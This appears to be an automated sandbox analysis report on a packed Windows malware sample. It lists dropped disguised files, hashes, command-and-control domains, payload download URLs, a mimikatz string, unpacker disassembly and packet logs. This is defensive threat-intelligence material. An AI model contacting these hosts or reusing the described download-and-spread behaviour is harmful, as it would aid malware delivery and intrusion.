SHA-512: F74D87448422D09145272C40D883FF4CA8507D52D75AE79918B0CBD1B4092FACA1793E04017E6AEE8971A33716DDC8627616D3735122F2FEC513231888E3B670

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........W.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_X.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe



Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 518381EF94EF92C159998DBBE5A598BD

SHA1: FD44E4D5E71C096B9A43492A068910421C13100E

SHA-256: 3F335E6630B2F7DCF68E5E4A9A5BEDFE17FF054AF9A26CED01D11B85C4B22B91

SHA-512: 83B1EA18537C76662BE30F9B0EF893A89B5148D1E22C03FAF98FA128470AE149AFFCC09CBB2E031C4007C6BBDADBA117ABB1FF8E6295EBD5E893D627826BD680

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........X.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_X.lnk

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Y.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: FF27F3942A805A0EF80B27C4526F0829

SHA1: A4BA760D56E62C4C1E81E2DE08F655609F4995C3

SHA-256: C4C6B752C01A4C835A19F1BD69729B9D88402EEB68BE66E26C9D2440EBCCCB9C

SHA-512: 9D17E4A8FEC119C43CBFF123653C44CCD5131AA1A9AFB84E407BCB890A725E60F827C1ED1FB069CDC5F0178CBCE22B0397EFEA385AE02037DCF7526724ADC7A3

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........Y.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Z.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: D27BF068B2968FB2B5D6975FCAA91390

SHA1: B1092656EBF537CB89CD16486B31FCDB2A92DCAB

SHA-256: BA5D989B90476054FDAD3754BA98AB39EC4BA0D9E712372993E0938C88BCF632

SHA-512: DA4B040CE9FE92F81E9A1E02574926CF385EE45C2926A7424DAD8DB3FC336DE8B3E2EC06766567595323CF4A0636E3BB13358159B6087F48FB90D582429DF16D

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........Z.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\SysWOW64\ycemck.exe

Process: C:\WebKitSdk\2.25.14\qwr4rt.exe

File Type: PE32 executable (GUI) Intel 80386, for MS Windows

Size (bytes): 73728

Entropy (8bit): 5.192189717439081

Encrypted: false

MD5: EABDC54C61088B769E9AF917AA6B05A4

SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6

SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F

SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997

Malicious: true

Antivirus: Antivirus: Avira, Detection: 100%Antivirus: virustotal, Detection: 79%, Browse

Joe Sandbox View:

Filename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, Browse












Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\ycemck.exe

C:\Windows\System32\drivers\etc\hosts

Process: C:\Windows\cc3d3243\b158ac7.exe

File Type: ASCII text, with CRLF line terminators

Size (bytes): 822

Entropy (8bit): 4.496194958534843

Encrypted: false

MD5: 44B5974CAB4A544EE9DF159CEBBA553F

SHA1: 2ADA6F1ABC516C916E4B9170F096EB4536B8D039

SHA-256: 0BAE62CA504D9D90B6181194F9858F7C770E816E7EE1C15428B40AF63C818721

SHA-512: 7B39D171C014BBA0539576F1612751B6951E5102D9B4BC46721F93159CE28E3FFD7D21473951EEFAEA1B4A84E0A976FB3231A38BB057BABB245FE02D786BCB1D

Malicious: true

Preview: # copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address should..# be placed in the first column followed by the corresponding host name...# the ip address and the host name should be separated by at least one..# space...#..# additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# for example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within dns itself...#.127.0.0.1 localhost..#.::1 localhost

C:\Windows\Temp\sqlisrv.exe




Entropy (8bit): 7.82218228744185

Encrypted: false

MD5: 1328C9CC50BD324399B4A83CA043BE6E




Malicious: true



C:\Windows\cc3d3243\b158ac7.exe

Process: C:\WebKitSdk\2.25.14\sqlisrv.exe



Entropy (8bit): 7.82218228744185

Encrypted: false

MD5: 1328C9CC50BD324399B4A83CA043BE6E




Malicious: true



\Device\ConDrvProcess: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe

File Type: ASCII text, with CRLF, CR line terminators

Size (bytes): 10528

Entropy (8bit): 4.311543004413748




Encrypted: false

MD5: A66AD9C43AE7763A50F87C9058B5B0C1

SHA1: BE246856E1BA7645BF1531C3C72467036DA1FA10

SHA-256: A472726FEA59B0AE9A0B4C64CFA4F7CC52B0DD54C2F156EDAAD0A9C94F3EED54

SHA-512: 369BF96BDE0E45AF7BCE380FB3A37A1ABFA8A4432CA206F472D3CFF7C93A60713B36A63B17619CCB85C49A916B6F78833385A8A2FACA2BBACDBA59A173B3149F

Malicious: false

Preview: Fuck Man !....0 IP Scanned.Taking 0 Threads .0 IP Scanned.Taking 1 Threads .0 IP Scanned.Taking 2 Threads .0 IP Scanned.Taking 3 Threads .0 IP Scanned.Taking 4 Threads .0 IP Scanned.Taking 5 Threads .0 IP Scanned.Taking 6 Threads .0 IP Scanned.Taking 7 Threads .0 IP Scanned.Taking 8 Threads .0 IP Scanned.Taking 9 Threads .0 IP Scanned.Taking 10 Threads .0 IP Scanned.Taking 11 Threads .0 IP Scanned.Taking 12 Threads .0 IP Scanned.Taking 13 Threads .0 IP Scanned.Taking 14 Threads .0 IP Scanned.Taking 15 Threads .0 IP Scanned.Taking 16 Threads .0 IP Scanned.Taking 17 Threads .0 IP Scanned.Taking 18 Threads .0 IP Scanned.Taking 19 Threads .0 IP Scanned.Taking 20 Threads .0 IP Scanned.Taking 21 Threads .0 IP Scanned.Taking 22 Threads .0 IP Scanned.Taking 23 Threads .0 IP Scanned.Taking 24 Threads .0 IP Scanned.Taking 25 Threads .0 IP Scanned.Taking 26 Threads .0 IP Scanned.Taking 27 Threads .0 IP Scanned.Taking 28 Threads .0 IP Scanned.Taking 29 Threads .0 IP Scanned.Taking 30 Threads .0 IP

\Device\ConDrv

Name IP Active Malicious Antivirus Detection Reputation

2019.ip138.com 117.25.157.119 true false high

upa1.hognoob.se 172.104.161.101 true false high

upa2.hognoob.se 172.105.237.113 true false high

pxx.hognoob.se 23.106.122.2 true true unknown

q1a.hognoob.se 23.106.122.2 true false high

uio.hognoob.se 195.128.126.120 true false high

fid.hognoob.se 45.67.14.164 true false high

haq.hognoob.se 195.128.124.140 true false 6%, virustotal, Browse unknown

Name Malicious Antivirus Detection Reputation

uio.hognoob.se:63145/cfg.ini false high

fid.hognoob.se/sqlisrv.exe true 19%, virustotal, BrowseAvira URL Cloud: safe

unknown

Name Source Malicious Antivirus Detection Reputation

fid.hognoob.se/sqlisrv.exeC: certutil.exe, 0000000A.00000002.5515216968.00000000034D0000.00000004.sdmp, certutil.exe, 0000000A.00000002.5515380973.00000000034F0000.00000004.sdmp

false Avira URL Cloud: safe unknown

repository.certum.pl/ctnca.cer09 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

repository.certum.pl/cscasha2.cer0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries


https://www.virustotal.com/url/e5730ccf134936b07735216d898646897dc95c63f1aa5164bc175617945a21dc/analysis/1558016543/

https://www.virustotal.com/url/77015ae533eb5427b157a278ddb011c5023750157820aa1d0cc97632ca2f4d02/analysis/1557883691/

uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob

sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp


crl.certum.pl/ctnca.crl0k sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

www.openssl.org/V sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

false high

https://ifconfig.me/ sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

schemas.xmlsoap.org/soap/envelope/ sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

false high

www.sysinternals.com sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME

sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

true Avira URL Cloud: safe low

https://www.certum.pl/CPS0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

crl.certum.pl/cscasha2.crl0q sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

bea.com/2004/06/soap/workarea/ sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

false high



cscasha2.ocsp-certum.com04 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

u2. sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, certutil.exe, 0000000A.00000003.5487030738.0000000005784000.00000004.sdmp


fid.hognoob.se/download.exeC: sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

true Avira URL Cloud: safe unknown

repository.certum.pl/ctnca.cer0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

blog.gentilkiwi.com/mimikatz sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

www.zlib.net/D sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

fid.hognoob.se/download.exe sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

subca.ocsp-certum.com01 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

w.w3. sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

false high

2019.ip138.com/ic.asp sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

uio.heroherohero.info:63145/cfg.ini b158ac7.exe, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp

false high



www.certum.pl/CPS0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

false high

fid.hognoob.se/download.execmd.exe sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp

true Avira URL Cloud: safe unknown


No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

IP Country Flag ASN ASN Name Malicious

172.105.237.113 United States 63949 unknown false

172.104.161.101 United States 63949 unknown false

195.128.126.120 Russian Federation 47196 unknown false

IP

192.168.0.2

192.168.0.1

192.168.0.4

192.168.0.3

192.168.0.14

192.168.0.9

192.168.0.15

192.168.0.16

192.168.0.17

192.168.0.6

Contacted IPs

Public

Private


192.168.0.18

192.168.0.5

192.168.0.19

192.168.0.8

192.168.0.7

192.168.0.20

192.168.0.21

192.168.0.22

192.168.0.23

192.168.0.24

192.168.0.10

192.168.0.11

192.168.0.12

192.168.0.13

192.168.0.170

192.168.0.172

192.168.0.171

192.168.0.58

192.168.0.59

192.168.0.61

192.168.0.62

192.168.0.63

192.168.0.64

192.168.0.65

192.168.0.66

192.168.0.67

192.168.0.68

192.168.0.178

192.168.0.177

192.168.0.179

192.168.0.174

192.168.0.173

192.168.0.176

192.168.0.60

192.168.0.175

192.168.0.161

192.168.0.160

192.168.0.47

192.168.0.48

192.168.0.49

192.168.0.50

192.168.0.51

192.168.0.52

192.168.0.53

192.168.0.54

192.168.0.55

192.168.0.56

192.168.0.57

192.168.0.167

192.168.0.166

192.168.0.169

192.168.0.168

192.168.0.163

192.168.0.162

127.0.0.1

192.168.0.165

192.168.0.164

192.168.0.192

192.168.0.191

192.168.0.194

192.168.0.193

192.168.0.190

192.168.0.36

192.168.0.37

IP


Static File Info

GeneralFile type: PE32 executable (GUI) Intel 80386, for MS Windows,

UPX compressed

Entropy (8bit): 7.927054570350866

TrID: Win32 Executable (generic) a (10002005/4) 99.66%UPX compressed Win32 Executable (30571/9) 0.30%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%

File name: download.exe

File size: 322560

MD5: 31e46700743faa4304532b36311e1177

SHA1: 63e939ba9344836cd7e62fc0da531f421f96c645

SHA256: 364faa9f9bec15ad226a2b4a03869ec42ad5aa7f2d6c99c65690d4b1de48a0dc

SHA512: 7e75fd7ab1931be15841dcdcd774ab93680ecde9d95241fe13c593e8fbf29aa245f2a7ff29cc1f7590b6319da6d25ea558dad99853e925e62bc8026edb77b998

SSDEEP: 6144:wr3mS3XmD1Jx5LpCKN4NalDAmD+z0fH9rK5Bdd+qaggVM/EaG8v:wiS3g1Jx5LpbEYnM0FQ7abm/3

File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*s$.n.JOn.JOn.JO..FOm.JO..DOE.JOX4@O..JO8.YOB.JOn.KO..JO..YOy.JOX4AO0.JO..AO>[email protected]'.JO..LOo.JORichn.JO........PE..L..

File Icon

Icon Hash: 00828e8e8686b000

192.168.0.38

192.168.0.39

192.168.0.40

192.168.0.41

192.168.0.42

192.168.0.43

192.168.0.44

192.168.0.45

192.168.0.46

192.168.0.199

192.168.0.196

192.168.0.195

192.168.0.198

192.168.0.197

192.168.0.181

192.168.0.180

192.168.0.183

192.168.0.182

192.168.0.25

192.168.0.26

192.168.0.27

192.168.0.28

192.168.0.29

IP

GeneralEntrypoint: 0x4dc1d0

Static PE Info


Entrypoint Section: UPX1

Digitally signed: false

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

DLL Characteristics:

Time Stamp: 0x5CD8F147 [Mon May 13 04:23:35 2019 UTC]

TLS Callbacks:

CLR (.Net) Version:

OS Version Major: 4

OS Version Minor: 0

File Version Major: 4

File Version Minor: 0

Subsystem Version Major: 4

Subsystem Version Minor: 0

Import Hash: c2ee7d277580fccb850519e0885ea7e1

General

Instruction

pushad

mov esi, 0048E000h

lea edi, dword ptr [esi-0008D000h]

push edi

jmp 00007F093078760Dh

nop

mov al, byte ptr [esi]

inc esi

mov byte ptr [edi], al

inc edi

add ebx, ebx

jne 00007F0930787609h

mov ebx, dword ptr [esi]

sub esi, FFFFFFFCh

adc ebx, ebx

jc 00007F09307875EFh

mov eax, 00000001h

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

adc eax, eax

add ebx, ebx

jnc 00007F093078760Dh

jne 00007F093078762Ah


sub esi, FFFFFFFCh

adc ebx, ebx

jc 00007F0930787621h

dec eax

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

adc eax, eax

jmp 00007F09307875D6h

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

adc ecx, ecx

Entrypoint Preview


jmp 00007F0930787654h

xor ecx, ecx

sub eax, 03h

jc 00007F0930787613h

shl eax, 08h

mov al, byte ptr [esi]

inc esi

xor eax, FFFFFFFFh

je 00007F0930787677h

sar eax, 1

mov ebp, eax

jmp 00007F093078760Dh

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

jc 00007F09307875CEh

inc ecx

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

jc 00007F09307875C0h

add ebx, ebx

jne 00007F0930787609h


sub esi, FFFFFFFCh

adc ebx, ebx

adc ecx, ecx

add ebx, ebx

jnc 00007F09307875F1h

jne 00007F093078760Bh


sub esi, FFFFFFFCh

adc ebx, ebx

jnc 00007F09307875E6h

add ecx, 02h

cmp ebp, FFFFFB00h

adc ecx, 02h

lea edx, dword ptr [edi+ebp]

cmp ebp, FFFFFFFCh

jbe 00007F0930787610h

mov al, byte ptr [edx]

Instruction

Programming Language: [C++] VS98 (6.0) SP6 build 8804[C++] VS98 (6.0) build 8168[EXP] VC++ 6.0 SP5 build 8804[ C ] VS98 (6.0) SP6 build 8804[ C ] VS98 (6.0) build 8168

Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IMPORT 0xdd000 0x314 UPX2

IMAGE_DIRECTORY_ENTRY_RESOURCE 0x0 0x0

IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0

IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0

IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0

Rich Headers

Data Directories


Network Port Distribution

Total Packets: 91

• 53 (DNS)

• 9456 undefined

• 80 (HTTP)

IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IAT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0

Name Virtual Address Virtual Size Is in Section

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

UPX0 0x1000 0x8d000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ

UPX1 0x8e000 0x4f000 0x4e400 False 0.99159781849 data 7.93228374473 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

UPX2 0xdd000 0x1000 0x400 False 0.3818359375 data 3.35216759537 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

DLL Import

ADVAPI32.dll RegCloseKey

COMCTL32.dll

comdlg32.dll ChooseColorA

GDI32.dll PatBlt

KERNEL32.DLL LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

ole32.dll OleInitialize

OLEAUT32.dll LoadTypeLib

RASAPI32.dll RasHangUpA

SHELL32.dll ShellExecuteA

USER32.dll GetDC

WININET.dll InternetOpenA

WINMM.dll waveOutOpen

WINSPOOL.DRV OpenPrinterA

WS2_32.dll inet_ntoa

Network Behavior

Sections

Imports

TCP Packets


Timestamp Source Port Dest Port Source IP Dest IP

May 16, 2019 17:15:39.132663965 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.180200100 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.183634996 CEST 49798 9456 192.168.2.5 23.106.122.2

May 16, 2019 17:15:39.183851957 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.184736013 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.233027935 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233145952 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233315945 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233326912 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233336926 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233350992 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233360052 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233367920 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233536959 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233547926 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.233556986 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.238857985 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.239150047 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.286458015 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286477089 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286485910 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286504030 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286513090 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286595106 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286619902 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286629915 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.286633015 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286649942 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286689997 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286703110 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.286705971 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286756039 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286761045 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.286775112 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286803007 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286818981 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286834002 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286859989 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286875010 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286890984 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.286906004 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.287177086 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335172892 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335196972 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335212946 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335227013 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335242033 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335257053 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335303068 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335318089 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335328102 CEST 49797 80 192.168.2.5 45.67.14.164

